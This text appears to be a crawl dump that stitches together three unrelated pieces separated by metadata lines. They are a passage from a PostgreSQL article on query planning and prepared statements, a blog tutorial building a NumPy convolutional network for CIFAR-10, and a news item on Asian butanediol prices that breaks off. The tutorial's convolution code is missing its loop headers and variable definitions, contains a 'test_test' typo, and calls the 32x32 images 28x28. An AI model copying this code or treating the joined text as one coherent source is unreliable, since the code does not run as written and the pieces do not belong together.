pg_namespace n (cost=0.00..1.04 rows=4 wid... (7 rows) ``` The image shows the main nodes of the tree. The same nodes are marked with arrows in the EXPLAIN output. The Seq Scan node represents the table read operation, while the Nested Loop node represents the join operation. There are two interesting points to take note of here: * One of the initial tables is gone from the plan tree because the planner figured out that it's not required to process the query and removed it. * There is an estimated number of rows to process and the cost of processing next to each node. **Plan search.** To find the optimal plan, PostgreSQL utilizes the *cost-based query optimizer*. The optimizer goes through various available execution plans and estimates the required amounts of resources, such as I/O operations and CPU cycles. This calculated estimate, converted into arbitrary units, is known as the *plan cost*. The plan with the lowest resulting cost is selected for execution. The trouble is, the number of possible plans grows exponentially as the number of joins increases, and sifting through all the plans one by one is impossible even for relatively simple queries. Therefore, dynamic programming and heuristics are used to limit the scope of search. This allows to precisely solve the problem for a greater number of tables in a query within reasonable time, but the selected plan is not guaranteed to be *truly* optimal because the planner utilizes simplified mathematical models and may use imprecise initial data. **Ordering joins.** A query can be structured in specific ways to significantly reduce the search scope (at a risk of missing the opportunity to find the optimal plan):  * Common table expressions are usually optimized separately from the main query. Since version 12, this can be forced with the MATERIALIZE clause. * Queries from non-SQL functions are optimized separately from the main query. (SQL functions can be inlined into the main query in some cases.) * The *join\_collapse\_limit* parameter together with explicit JOIN clauses, as well as the *from\_collapse\_limit* parameter together with sub-queries may define the order of some joins, depending on the query syntax. The last one may need an explanation. The query below calls several tables within a FROM clause with no explicit joins: ``` SELECT ... FROM a, b, c, d, e WHERE ... ``` This is the parse tree for this query: ![](https://habrastorage.org/r/w1560/getpro/habr/upload_files/904/ce8/a3f/904ce8a3fd985a9d6f372620493192f4.png)In this query, the planner will consider all possible join orders. In the next example, some joins are explicitly defined by the JOIN clause: ``` SELECT ... FROM a, b JOIN c ON ..., d, e WHERE ... ``` The parse tree reflects this: ![](https://habrastorage.org/r/w1560/getpro/habr/upload_files/30b/8f1/6c4/30b8f16c487de8762cde8a2eeb222a90.png)The planner collapses the join tree, effectively transforming it into the tree from the previous example. The algorithm recursively traverses the tree and replaces each JOINEXPR node with a flat list of its components. This "flattening out" will only occur, however, if the resulting flat list will contain no more than *join\_collapse\_limit* elements (8 by default). In the example above, if join\_collapse\_limit is set to 5 or less, the JOINEXPR node will not be collapsed. For the planner this means two things: * Table B must be joined to table C (or vice versa, the join order in a pair is not restricted). * Tables A, D, E, and the join of B to C may be joined in any order. If *join\_collapse\_limit* is set to 1, any explicit JOIN order will be preserved. Note that the operation FULL OUTER JOIN is *never* collapsed regardless of *join\_collapse\_limit*. The parameter *from\_collapse\_limit* (also 8 by default) limits the flattening of sub-queries in a similar manner. Sub-queries don't appear to have much in common with joins, but when it comes down to the parse tree level, the similarity is apparent. Example: ``` SELECT ... FROM a, b JOIN c ON ..., d, e WHERE ... ``` And here's the tree: ![](https://habrastorage.org/r/w1560/getpro/habr/upload_files/641/ae6/078/641ae607845cb4f95baf9e2085f00835.png)The only difference here is that the JOINEXPR node is replaced with FROMEXPR (hence the parameter name FROM). **Genetic search.** Whenever the resulting flattened tree ends up with too many same-level nodes (tables or join results), planning time may skyrocket because each node requires separate optimization. If the parameter *geqo* is on (it is by default), PostgreSQL will switch to *genetic search* whenever the number of same-level nodes reaches *geqo\_threshold* (12 by default). Genetic search is much faster than the dynamic programming approach, but it does not guarantee that the best possible plan will be found. This algorithm has a number of adjustable options, but that's a topic for another article. **Selecting the best plan.** The definition of the best plan varies depending on the intended use. When a complete output is required (for example, to generate a report), the plan must optimize the retrieval of all rows that match the query. On the other hand, if you only want the first several matching rows (to display on the screen, for example), the optimal plan might be completely different. PostgreSQL addresses this by calculating two cost components. They are displayed in the query plan output after the word "cost": ``` Sort (cost=21.03..21.04 rows=1 width=128) ``` The first component, startup cost, is the cost to prepare for the execution of the node; the second component, total cost, represents the total node execution cost. When selecting a plan, the planner first checks if a cursor is in use (a cursor can be set up with the DECLARE command or *explicitly* declared in PL/pgSQL). If not, the planner assumes that the full output is required and selects the plan with the least total cost. Otherwise, if a cursor is used, the planner selects a plan that optimally retrieves the number of rows equal to *cursor\_tuple\_fraction* (0.1 by default) of the total number of matching rows. Or, more specifically, a plan with the lowest startup cost + *cursor\_tuple\_fraction*  × (total cost − startup cost). **Cost calculation process.** To estimate a plan cost, each of its nodes has to be individually estimated. A node cost depends on the node type (reading from a table costs much less than sorting the table) and the amount of data processed (in general, the more data, the higher the cost). While the node type is known right away, to assess the amount of data we first need to estimate the node's *cardinality* (the amount of input rows) and *selectivity* (the fraction of rows left over for output). To do that, we need data *statistics*: table sizes, data distribution across columns. Therefore, optimization depends on accurate statistics, which are gathered and kept up-to-date by the autoanalyze process. If the cardinality of each plan node is estimated accurately, the total cost calculated will usually match the actual cost. Common planner deviations are usually the result of incorrect estimation of cardinality and selectivity. These errors are caused by inaccurate, outdated or unavailable statistics data, and, to a lesser extent, inherently imperfect models the planner is based on. **Cardinality estimation.** Cardinality estimation is performed recursively. Node cardinality is calculated using two values: * Cardinality of the node's child nodes, or the number of input rows. * Selectivity of the node, or the fraction of output rows to the input rows. Cardinality is the product of these two values. Selectivity is a number between 0 and 1. Selectivity values closer to zero are called *high selectivity*, and values closer to one are called *low selectivity*. This is because high selectivity eliminates a higher fraction of rows, and lower selectivity values bring the threshold down, so fewer rows are discarded. Leaf nodes with data access methods are processed first. This is where statistics such as table sizes come in. Selectivity of conditions applied to a table depends on the condition types. In its simplest form selectivity can be a constant value, but the planner tries to use all available information to produce the most accurate estimate. Selectivity estimations for the simplest conditions serve as the basis, and complex conditions built with Boolean operations can be further calculated using the following straightforward formulas: *selx* and *y* = *selx sely* *selx* or *y* = 1−(1−*selx*)(1−*sely*) = *selx* + *sely* − *selx sely*. In these formulas, *x* and *y* are considered independent. If they correlate, the formulas are still used, but the estimate will be less accurate. For a cardinality estimate of joins, two values are calculated: the cardinality of the Cartesian product (the product of cardinalities of two data sets) and the selectivity of the join conditions, which in turn depends on the condition types. Cardinality of other node types, such as sorting or aggregation nodes, is calculated similarly. Note that a cardinality calculation mistake in a lower node will propagate upward, resulting in inaccurate cost estimation and, ultimately, a sub-optimal plan. This is made worse by the fact that the planner only has statistical data on tables, not on join results. **Cost estimation.** Cost estimation process is also recursive. The cost of a sub-tree comprises the costs of its child nodes plus the cost of the parent node. Node cost calculation is based on a mathematical model of the operation it performs. The cardinality, which has been already calculated, serves as the input. The process calculates both startup cost and total cost. Some operations don't require any preparation and can start executing immediately. For these operations, the startup cost will be zero. Other operations may have prerequisites. For example, a sorting node will usually require *all* of the data from its child node to begin the operation. These nodes have a non-zero startup cost. This cost has to be paid, even if the next node (or the client) only needs a single row of the output. The cost is the planner's best estimate. Any planning mistakes will affect how much the cost will correlate with the actual time to execute. The primary purpose of cost assessment is to allow the planner to compare different execution plans for the *same* query in the *same* conditions. In any other case, comparing queries (worse, different queries) by cost is pointless and wrong. For example, consider a cost that was underestimated because the statistics were inaccurate. Update the statistics–and the cost may change, but the estimate will become more accurate, and the plan will ultimately improve. **Execution** An optimized query is *executed* in accordance with the plan. An object called a *portal* is created in backend memory. The portal stores the state of the query as it is executed. This state is represented as a tree, identical in structure to the plan tree. The nodes of the tree act as an assembly line, requesting and delivering rows to each other. ![](https://habrastorage.org/r/w1560/getpro/habr/upload_files/de8/0f1/273/de80f1273b1a15578a656a2182c88f3d.png)Execution starts at the root node. The root node (the sorting node SORT in the example) requests data from the child node. When it receives all requested data, it performs the sorting operation and then delivers the data upward, to the client. Some nodes (such as the NESTLOOP node) join data from different sources. This node requests data from two child nodes. Upon receiving two rows that match the join condition, the node immediately passes the resulting row to the parent node (unlike with sorting, which must receive *all* rows before processing them). The node then stops until its parent node requests another row. Because of that, if only a partial result is required (as set by LIMIT, for example), the operation will not be executed fully. The two SEQSCAN leafs are table scans. Upon request from the parent node, a leaf node reads the next row from the table and returns it. This node and some others do not store rows at all, but rather just deliver and forget them immediately. Other nodes, such as sorting, may potentially need to store vast amounts of data at a time. To deal with that, a *work\_mem* memory chunk is allocated in backend memory. Its default size sits at a conservative 4MB limit; when the memory runs out, excess data is sent to a temporary file on-disk. A plan may include multiple nodes with storage requirements, so it may have several chunks of memory allocated, each the size of *work\_mem*. There is no limit on the total memory size that a query process may occupy. **Extended query protocol** With simple query protocol, any command, even if it's being repeated again and again, goes through all these stages outlined above: 1. Parsing. 2. Transformation. 3. Planning. 4. Execution. But there is no reason to parse the same query over and over again. Neither is there any reason to parse queries anew if they differ in constants only: the parse tree will be the same. Another annoyance with the simple query protocol is that the client receives the output in full, however long it may be. Both issues can be overcome with the use of SQL commands: PREPARE a query and EXECUTE it for the first problem, DECLARE a cursor and FETCH the needed rows for the second one. But then the client will have to handle naming new objects, and the server will need to parse extra commands. The extended query protocol enables precise control over separate execution stages at the protocol command level. **Preparation** During *preparation*, a query is parsed and transformed as usual, but the parse tree is stored in backend memory. PostgreSQL doesn't have a global cache for parsed queries. Even if a process has parsed the query before, other processes will have to parse it again. There are benefits to this design, however. Under high load, global in-memory cache will easily become a bottleneck because of locks. One client sending multiple small commands may affect the performance of the whole instance. In PostgreSQL, query parsing is cheap and isolated from other processes. A query can be prepared with additional parameters. Here's an example using SQL commands (again, this is not equivalent to preparation on protocol command level, but the ultimate effect is the same): ``` PREPARE plane(text) AS SELECT * FROM aircrafts WHERE aircraft_code = $1; ``` Most examples in this article series will use the [demo database "Airlines."](https://postgrespro.com/education/demodb)  This view displays all named prepared statements: ``` SELECT name, statement, parameter_types FROM pg_prepared_statements \gx −[ RECORD 1 ]−−−+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− name | plane statement | PREPARE plane(text) AS + | SELECT * FROM aircrafts WHERE aircraft_code = $1; parameter_types | {text} ``` The view does not list any unnamed statements (that use the extended protocol or PL/pgSQL). Neither does it list prepared statements from other sessions: accessing another session's memory is impossible. **Parameter binding** Before a prepared query is executed, current parameter values are bound. ``` EXECUTE plane('733'); aircraft_code | model | range −−−−−−−−−−−−−−−+−−−−−−−−−−−−−−−+−−−−−−− 733 | Boeing 737−300 | 4200 (1 row) ``` One advantage of prepared statements compared to concatenation of literal expressions is protection against any sort of SQL injection, because parameter values do not affect the parse tree that has been already built. Reaching the same level of security without prepared statements will require extensive escaping of all values coming in from untrusted sources. **Planning and execution** When a prepared statement is executed, first its query is planned with the provided parameters taken into account, then the chosen plan is sent for execution. Actual parameter values are important to the planner, because optimal plans for different sets of parameters may also be different. For example, when looking for premium flight bookings, index scan is used (as shown by the words "Index Scan"), because the planner expects that there aren't many matching rows: ``` CREATE INDEX ON bookings(total_amount); EXPLAIN SELECT * FROM bookings WHERE total_amount > 1000000; QUERY PLAN −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− Bitmap Heap Scan on bookings (cost=86.38..9227.74 rows=4380 wid... Recheck Cond: (total_amount > '1000000'::numeric) −> Bitmap Index Scan on bookings_total_amount_idx (cost=0.00.... Index Cond: (total_amount > '1000000'::numeric) (4 rows) ``` This next condition, however, matches absolutely all bookings. Index scan is useless here, and sequential scan (Seq Scan) is performed: ``` EXPLAIN SELECT * FROM bookings WHERE total_amount > 100; QUERY PLAN −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− Seq Scan on bookings (cost=0.00..39835.88 rows=2111110 width=21) Filter: (total_amount > '100'::numeric) (2 rows) ``` In some cases the planner stores the query plan in addition to the parse tree, to avoid planning it again if it comes up. This plan, devoid of parameter values, is called a *generic plan*, as opposed to a *custom plan* that is generated using the given parameter values. An obvious use case for a generic plan is a statement with no parameters. For the first four runs, prepared statements with parameters are always optimized with regards to the actual parameter values. Then the average plan cost is calculated. On the fifth run and beyond, if the generic plan turns out to be cheaper on average than custom plans (which have to be rebuilt anew every time), the planner will store and use the generic plan from then on, foregoing further optimization. The `plane` prepared statement has already been executed once. In the next two executions, custom plans are still used, as shown by the parameter value in the query plan: ``` EXECUTE plane('763'); EXECUTE plane('773'); EXPLAIN EXECUTE plane('319'); QUERY PLAN −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− Seq Scan on aircrafts_data ml (cost=0.00..1.39 rows=1 width=52) Filter: ((aircraft_code)::text = '319'::text) (2 rows) ``` After four executions, the planner will switch to the generic plan. The generic plan in this case is identical to custom plans, has the same cost, and therefore is preferable. Now the EXPLAIN command shows the parameter number, not the actual value: ``` EXECUTE plane('320'); EXPLAIN EXECUTE plane('321'); QUERY PLAN −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− Seq Scan on aircrafts_data ml (cost=0.00..1.39 rows=1 width=52) Filter: ((aircraft_code)::text = '$1'::text) (2 rows) ``` It is unfortunate but not inconceivable when only the first four custom plans are more costly than the generic plan, and any further custom plans would have been cheaper–but the planner will ignore them altogether. Another possible source of imperfection is that the planner compares cost *estimates*, not actual resource costs to be spent. This is why in versions 12 and above, if the user dislikes the automatic result, they can force the system to use the generic plan or a custom plan. This is done with the parameter *plan\_cache\_mode*: ``` SET plan_cache_mode = 'force_custom_plan'; EXPLAIN EXECUTE plane('CN1'); QUERY PLAN −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− Seq Scan on aircrafts_data ml (cost=0.00..1.39 rows=1 width=52) Filter: ((aircraft_code)::text = 'CN1'::text) (2 rows) ``` In version 14 and above, the pg\_prepared\_statements view also displays plan selection statistics: ``` SELECT name, generic_plans, custom_plans FROM pg_prepared_statements; name | generic_plans | custom_plans −−−−−−−+−−−−−−−−−−−−−−−+−−−−−−−−−−−−−− plane | 1 | 6 (1 row) ``` **Output retrieval** The extended query protocol allows the client to fetch the output in batches, several rows at a time, rather than all at once. The same can be achieved with the help of SQL cursors, but at a higher cost, and the planner will optimize the retrieval of the first *cursor\_tuple\_fraction* rows: ``` BEGIN; DECLARE cur CURSOR FOR SELECT * FROM aircrafts ORDER BY aircraft_code; FETCH 3 FROM cur; aircraft_code | model | range −−−−−−−−−−−−−−−+−−−−−−−−−−−−−−−−−−+−−−−−−− 319 | Airbus A319−100 | 6700 320 | Airbus A320−200 | 5700 321 | Airbus A321−200 | 5600 (3 rows) FETCH 2 FROM cur; aircraft_code | model | range −−−−−−−−−−−−−−−+−−−−−−−−−−−−−−−+−−−−−−− 733 | Boeing 737−300 | 4200 763 | Boeing 767−300 | 7900 (2 rows) COMMIT; ``` Whenever a query returns a lot of rows, and the client needs them all, the number of rows retrieved at a time becomes paramount for overall data transmission speed. The larger a single batch of rows, the less time is lost on roundtrip delays. The savings fall off in efficiency, however, as the batch size increases. For example, switching from a batch size of one to a batch size of 10 will increase the time savings dramatically, but switching from 10 to 100 will barely make any difference. Stay tuned for the next article, where we will talk about the foundation of cost optimization: statistics.
https://habr.com/ru/post/649499/
null
null
4,458
54.12
Understanding Convolutional Neural NetworksJuly 22, 2017 In my last post, we learned about some advanced neural network topics and built them into our NN micro-framework. Now, we put that advanced framework to use to understand Convolutional Neural Networks (CNNs). CNNs are neural networks which are mostly employed on vision tasks–that is, problems that have to do with pictures. The benefit of using a CNN over a fully-connected network on images is that CNNs preserve spatial relationships and can gain insights into the visual structure of the input picture. In this post, we will explore the math and intuition behind CNNs. We will also add to our micro-framework a Convolution layer and use it to create a simple, 3-hidden layer CNN on an image classification task. Convolutional Layers A convolutional layer is a layer which computes dot products over an input feature map to create an output feature map. A feature map is a 3-dimensional tensor in which two of the dimensions can be thought of as spatial width and height. The convolutional layer has one shared weight, known as a filter which is smaller than the feature map itself and is “slid” over the map to compute the dot product. As the filter slides over the input, it maps the dot product results to an output feature map, which can also be thought of as an image and can hence be fed as input into another convolutional layer. Shown above is a 3x3 image with a 2x2 convolutional filter being slid over it. At the current position the filter is at, the dot product between the image elements and the filter is taken and the output is mapped to the first element of the output feature map, so on and so forth. The filter then slides over 1 pixel and produces the second output feature map element. The size of the final output is 2x2. The amount that the filter is moved on each slide is known as the stride. The size of the filter itself is known as the kernel size or spatial extent. Each of the dot products is computed depth-wise, so each filter outputs a feature map of depth 1. We can have multiple filters in a convolutional layer so that its output has a larger depth. We can surround the border of the input with white pixels, known as padding, so that the output is larger and the filter can compute dot product over more of the input. All of these hyperparameters mean that the size of the output feature map is dependent on many variables. For example, if the input is 4x4, the kernel size is 2x2, and the stride is 2 with a padding of 0, the output is 2x2. Here is the equation to figure out what the output size is given the various hyperparameters: So that’s the math behind convolutional layers. But why do we want to do this? The fact that we use only one shared weight every time we “slide” over the whole image reflects the assumptions that “knowledge” that can be applied to one piece of the image can also be applied to another. For example, if there’s something that looks like an ear in a picture of a dog in one part of the image, we want to reuse the weight that understands it on the second ear in the same picture. In addition, the fact that we don’t just stretch the input feature map into one long column vector means that spatial information is preserved in the layer, which is crucial when we are doing vision tasks. This all means that convolutional layers are very powerful when we want our network to learn about images. Code Implementation Let’s add to our Layers file a Convolutional layer. The initializer should take the layer hyperparameters and initialize the filters, which we store in one huge 4-dimensional matrix. We also save the filter amount and kernel size as properties for convenient use in the forward function: class Convolutional(Layer): def __init__(self, channels, num_filters, kernel_size, stride=1, pad=0): super(Convolutional, self).__init__() self.params["W"] = np.random.randn(num_filters, channels, kernel_size, kernel_size) * 0.01 self.params["b"] = np.zeros(num_filters) self.stride = stride self.pad = pad self.F = num_filters self.HH, self.WW = kernel_size, kernel_size The input to the forward pass should be a 3-dimensional tensor, as should the output. Here’s the code for the forward function: def forward(self, input): N, C, H, W = input.shape F, HH, WW = self.F, self.HH, self.WW stride, pad = self.stride, self.pad H_prime = 1 + (H + 2 * pad - HH) / stride W_prime = 1 + (W + 2 * pad - WW) / stride assert H_prime.is_integer() and W_prime.is_integer(), 'Invalid filter dimension' H_prime, W_prime = int(H_prime), int(W_prime) out = np.zeros((N, F, H_prime, W_prime)) kernel = x_pad[:, :, h_start:h_end, w_start:w_end] kernel = kernel.reshape(N, C * HH * WW) conv = np.matmul(kernel, filters.T) + self.params["b"] out[:, :, i, j] = conv self.cache["input"] = input return out This function is pretty dense so let’s break it down. First we compute the output feature map dimensions using the above equations. Then, we instantiate the output feature map as a zero tensor, reshape the filters to a convenient shape for computation, and pad the input. Then we slide the filter over the input’s spatial dimension using two loops over the dimensions. The code in the inner loop takes the piece of the input that we are computing the dot product with, reshape it to convenient shape, perform the dot product, and store the result in the appropriate mapping location in the output feature map. As you might imagine, the backwards pass for this operation is fairly complicated: def backward(self, dout): input = self.cache["input"] stride, pad = self.stride, self.pad N, C, H, W = input.shape F, HH, WW = self.F, self.HH, self.WW _, _, H_prime, W_prime = dout.shape H_pad, W_pad = H + 2 * pad, W + 2 * pad dx = np.zeros((N, C, H + 2 * pad, W + 2 * pad)) dW = np.zeros_like(self.params["W"]) db = np.sum(dout, axis=(0, 2, 3)) piece = dout[:, :, i, j] x_piece = x_pad[:, :, h_start:h_end, w_start:w_end].reshape(N, C * HH * WW) dx_piece = np.matmul(piece, filters) dW_piece = np.matmul(piece.T, x_piece) dx[:, :, h_start:h_end, w_start:w_end] += dx_piece.reshape(N, C, HH, WW) dW += dW_piece.reshape(F, C, HH, WW) dx = dx[:, :, pad:H_pad - pad, pad:W_pad - pad] self.grads["W"], self.grads["b"] = dW, db return dx This is a monstrosity, so we’ll break it down again. The first thing we do is instantiate some useful variables that we’ll be using later on. We initialize the gradients on the input and filters as zero matrices, and we are able to directly compute the gradient on the bias by summing the incoming gradient across some dimensions. Notice that the gradient matrix on the input is initialized with the padded dimensions of the input, not the true input dimensions; this is important, as you’ll see soon. We once again loop over the spatial dimensions, but this time of the incoming gradient. This is where it gets interesting: we take specific slices of the incoming gradient and the input to the forward pass. Notice that that specific slice of the incoming gradient is from the same position in forward pass output feature map that was the result of a matrix multiplication between the filters and the input feature map slice that we just took. This means that we can now treat the incoming gradient piece as the output of a simple matrix multiplication between the input feature map piece and the filters and do backpropagation as expected: simply multiply the incoming gradient piece with the filters to get the gradient on the input, and multiply the incoming gradient piece with the input feature map piece to get the gradient on the filters. However, instead of setting the gradients to those values, we add it to the previously initialized matrices, as the gradients are aggregated over the whole loop over the spatial dimensions. One final step: we trim off the padded elements of the input gradient that were needed to do the aggregations to get the final gradient on the input at that layer. We save the gradients on the weight and the bias, and we’re finally ready to return the gradient on the input. Phew! Image Classification Let’s take our Convolutional layer for a run by building a CNN that we train on an image classification task. Image classification is the task of giving an algorithm a picture and having it determine what it is out of a known list of possible classes. We will use the small but useful CIFAR-10 dataset to do this. The dataset has 10 classes (airplane, automobile, bird, cat, deer, dog, frog, horse, ship, truck) and can be downloaded here. Data Loading Before we start making the model, let’s create a Loader class which can load and sample the dataset. We will use this class to give us a batch of data during train time. Here’s the initializer: class Loader(object): def __init__(self, batch_size, path="datasets/cifar-10-batches-py"): super(Loader, self).__init__() self.batch_size = batch_size train, validation, test = self.load_data(path) self.train_set, self.train_labels = train self.validation_set, self.validation_labels = validation self.test_set, self.test_labels = test self.train_set, mean, std = self.preprocess(self.train_set) self.validation_set = (self.validation_set - mean)/std self.test_test = (self.test_set - mean)/std We want to 1) load the data and 2) preprocess it. Preprocessing is fitting the training data to a Gaussian distribution, and using the training statistics to “normalize” the validation and test sets. Here’s the code to load the data: def load_data(self, path): train_set, train_labels = np.zeros((0, 3, 32, 32)), np.zeros((0)) validation_set, validation_labels = None, None test_set, test_labels = None, None files = [path + "/data_batch_%d" % (i+1) for i in range(5)] files.append(path + "/test_batch") for file in files: with open(file, 'rb') as fo: dict = pickle.load(fo, encoding='bytes') batch_set = dict[b"data"].reshape(10000, 3, 32, 32) batch_labels = np.array(dict[b"labels"]).reshape(10000) if "5" in file: validation_set, validation_labels = batch_set, batch_labels elif "test" in file: test_set, test_labels = batch_set, batch_labels else: train_set = np.concatenate((train_set, batch_set)) train_labels = np.concatenate((train_labels, batch_labels)) return (train_set, train_labels.astype(np.int32)), (validation_set, validation_labels.astype(np.int32)), (test_set, test_labels.astype(np.int32)) And here’s the code to preprocess the data: def preprocess(self, set): mean, std = np.mean(set, axis=0), np.std(set, axis=0) set -= mean set /= std return set, mean, std Finally let’s add a function to give us a batch of data: def get_batch(self): indeces = np.random.choice(self.train_set.shape[0], self.batch_size, replace=False) batch = np.array([self.train_set[i] for i in indeces]) labels = np.array([self.train_labels[i] for i in indeces]) return batch, labels Building and Training a CNN One more step before we build and train a network: we need to make a super simple Layer which flattens the final feature map from a 4-dimensional tensor into a vector: class Flatten(Layer): def __init__(self): super(Flatten, self).__init__() def forward(self, input): self.cache["shape"] = input.shape return input.reshape(input.shape[0], -1) def backward(self, dout): return dout.reshape(self.cache["shape"]) Now let’s build a 3-hidden-layer CNN that takes as input the 28x28 pixels images and outputs a 1x10 vector of class probabilities. We will use Softmax-Cross-Entropy as our loss function. Here’s the code to do that: loader = Loader(batch_size=16) layers = [Convolutional(3, 5, 6, stride=2), Convolutional(5, 7, 6, stride=2), Convolutional(7, 10, 4), Flatten()] loss = SoftmaxCrossEntropyLoss conv_network = Network(layers, loss, 1e-3) Finally, we train our network! for i in range(10000): batch, labels = loader.get_batch() pred, loss = conv_network.train(batch, labels) if (i + 1) % 100 == 0: accuracy = eval_accuracy(pred, labels) print("Training Accuracy: %f" % accuracy) if (i + 1) % 500 == 0: accuracy = eval_accuracy(conv_network.eval(loader.validation_set), loader.validation_labels) print("Validation Accuracy: %f \n" % accuracy) accuracy = eval_accuracy(conv_network.eval(loader.test_set), loader.test_labels) print("Test Accuracy: %f \n" % accuracy) Unfortunately, this does not yield great accuracy. In order to do better on this task, we’ll have to add more complex layers to the network. Advanced Layers Let’s code up some more layers that will make our convolutional network more advanced and (hopefully) accurate. Spatial Batch Normalization As you may recall from the last post, batch normalization is a good way to fit a layer’s output to a Gaussian distribution, reducing overfitting by your network. We want to employ this ability in our convolutional network. However, our BatchNorm layer expects a 2-dimensional input, while our feature map is 4-dimensional. We remedy this by simply reshaping the tensor before and after the BatchNorm forward and backward passes. Because we want to normalize over the spatial dimensions, the first dimension is the width times height times batch size, and the second dimension is necessarily the number of channels. Here’s the code: class BatchNorm2d(BatchNorm): def __init__(self, dim, epsilon=1e-5, momentum=0.9): super(BatchNorm2d, self).__init__(dim, epsilon, momentum) def forward(self, input): N, C, H, W = input.shape output = super(BatchNorm2d, self).forward(input.reshape(N * H * W, C)) return output.reshape((N, C, H, W)) def backward(self, dout): N, C, H, W = dout.shape dx = super(BatchNorm2d, self).backward(dout.reshape(N * H * W, C)) return dx.reshape((N, C, H, W)) Finally, add BatchNorm2d to the Network class’s diff tuple. Now we can add a batch normalization layer to convolutional networks. Max Pooling Max pooling is a layer which reduces the dimensionality of the a feature map. Similar to a convolution, the max pooling layer slides over the feature map; however, instead of computing the dot product of the kernel with a weight, it simply takes the maximum value in that kernel and sends it to the output feature map. That’s it! This prevents overfitting as well, as it does reduces dependence on specific neurons, and also reduces computational cost by reducing the dimensionality without the need of additional parameters. Here’s the code: class MaxPooling(Layer): def __init__(self, kernel_size, stride=1, pad=0): super(MaxPooling, self).__init__() self.stride = stride self.pad = pad self.HH, self.WW = kernel_size, kernel_size def forward(self, input): N, C, H, W = input.shape HH, WW, stride = self.HH, self.WW, self.stride H_prime = (H - HH) / stride + 1 W_prime = (W - WW) / stride + 1 out = np.zeros((N, C, H_prime, W_prime)) if not H_prime.is_integer() or not W_prime.is_integer(): raise Exception('Invalid filter dimension') H_prime, W_prime = int(H_prime), int(W_prime) for i in range(H_prime): h_start = i * stride h_end = h_start + HH for j in range(W_prime): w_start = j * stride w_end = w_start + WW kernel = input[:, :, h_start:h_end, w_start:w_end] kernel = kernel.reshape(N, C, HH * WW) max = np.max(kernel, axis=2) out[:, :, i, j] = max self.cache['input'] = input return out def backward(self, dout): input = self.cache['input'] N, C, H, W = input.shape HH, WW, stride = self.HH, self.WW, self.stride H_prime = int((H - HH) / stride + 1) W_prime = int((W - WW) / stride + 1) dx = np.zeros_like(input) for i in range(H_prime): h_start = i * stride h_end = h_start + HH for j in range(W_prime): w_start = j * stride w_end = w_start + WW max = dout[:, :, i, j] kernel = input[:, :, h_start:h_end, w_start:w_end] kernel = kernel.reshape(N, C, HH * WW) indeces = np.argmax(kernel, axis=2) grads = np.zeros_like(kernel) for n in range(N): for c in range(C): grads[n, c, indeces[n, c]] = max[n, c] dx[:, :, h_start:h_end, w_start:w_end] += grads.reshape(N, C, HH, WW) return dx This looks long, but it is almost identical to the Convolutional layer, so I won’t spend time explaining it. We can now add max pooling to our convolutional network. Advanced Network Now that we have some cool layers implemented, let’s take another shot at image classification. Let’s change our Layers list to and run the training regement again: layers = [Convolutional(3, 5, 4, stride=2), ReLU(), BatchNorm2d(5), MaxPooling(2, stride=1), Convolutional(5, 7, 4, stride=2), ReLU(), BatchNorm2d(7), MaxPooling(2, stride=1), Convolutional(7, 10, 5, stride=1), Flatten()] Sweet! We just created a convolutional neural network which is able to predict the class of a given CIFAR-10 image with about 50% validation accuracy! This may not sound too great, but considering that there are 10 classes, and that this is a simplistic network architecture with very few parameters, that’s not too bad! You may be wondering: how does a simple 3-hidden-layer architecture do as well as it does on this task? The reason is that each layer can be thought to learn more and more complex insights about the original input. The first layer, for example, detects edges; the next assembles those edges into shapes; and the last layer assembles shapes into higher-level concepts, such as ears, wings, or wheels. This way of thinking about the architecture has roots in research by Hubel & Wiesel which showed that the image-processing in a cat’s brain occurs in a similar hierarchical pattern as the one described above. Next Steps We used the CIFAR-10 Dataset to test out our model. There are many other publicly available image datasets like CIFAR-10 specifically made for image classification. One example is the MS-COCO dataset, a large dataset with pictures and accompanying annotations and captions. ImageNet a huge dataset with hundres of clases. The creators of the dataset hold a yearly competition to see who can build a network that achieves the highest accuracy on the set. We employed a classic–and simple–CNN architecture in our exercise. Some really crazy CNN architectures have been created over the last few years. For example, VGG-Net is recently-developed CNN that is 19 layers deep; Google’s well-known Inception network consists of Inception modules that split and concatenate feature maps through many non-sequential convolutions; and ResNet is an extremely deep (as in 152-layer) CNN which employs Residual Blocks that can learn to “ignore” certain convolutional layers completely. Check out some of the linked papers to learn more about recent advances in computer vision! Next week, we’ll be using our framework to learn about and create a Recurrent Neural Network for time-dependent problems, such as language translation or audio analysis. Check back next week for that. Happy learning!
https://shubhangdesai.github.io/blog/Understanding-CNNs
CC-MAIN-2018-13
refinedweb
3,117
55.84
19 July 2012 06:31 [Source: ICIS news] By Judith Wang SINGAPORE (ICIS)-. Asian spot bulk BDO prices rose to $2,100-2,200/tonne CFR (cost & freight) ?xml:namespace> Prices had had come down by around 24% since early April when they were at a high of $2,800-2,850/tonne. The decline was attributed to the falling crude futures, supply glut, and weak demand, according to market sources. Most of The average operating rate of The subsequent decreased BDO supply, combined with the recent rising prices of feedstock butadiene (BD), boosted the market and forced many sellers and suppliers to firm their offers, the sources said. Feedstock BD spot prices rose by $100/tonne to $2,400-2,500/tonne CFR NE Asia in the week ended 13 July. “The BD prices are rising, so we cannot drop our BDO prices anymore. We are under much pressure now,” a producer said. On the demand front, buyers who are sitting at low inventories started purchasing cargoes in anticipation of prices rising, although demand was relatively soft in the off-peak manufacturing summer season. BDO buyers include downstream rigid polyurethane (PU), polybutylene terephthalate (PBT) and polytetramethylene ether glycol (PTMEG) industries, which have seen their own demand remaining soft amid global economic uncertainty. “We have not traded BDO imports for a few months,” a trader said, adding: “If we build stocks and cannot find buyers we will face a big risk.” If the current import price at $2,100/tonne was converted to CNY equivalent, it comes to above CNY16,000/tonne - much higher than prevailing domestic prices - the trader added. The DEL China prices was also up by CNY200/tonne ($31/tonne) to CNY14,400-15,4000/tonne in the week ended on 17 July, according to ICIS. The trading activity on the import front has therefore been subdued 